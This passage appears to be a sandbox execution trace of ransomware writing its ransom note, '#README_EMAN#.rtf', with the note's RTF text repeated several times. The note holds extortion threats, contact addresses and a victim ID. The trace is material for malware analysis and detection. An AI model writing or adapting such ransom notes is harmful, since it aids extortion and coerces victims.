EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x24657d8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nù^=«\x16O\x1fïж>\x9bXË\x7fEóO¸Ù\x0c0\x9aÓM", lpUsedDefaultChar=0x0) returned 8717 [0295.506] WriteFile (in: hFile=0x2ec, lpBuffer=0x24657d8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x24657d8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0295.507] CloseHandle (hObject=0x2ec) returned 1 [0295.507] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\km-kh\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\km-kh\\#readme_eman#.rtf")) returned 0xffffffff [0295.507] GetLastError () returned 0x2 [0295.507] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\km-kh\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\km-kh\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ec [0295.508] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0295.508] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. 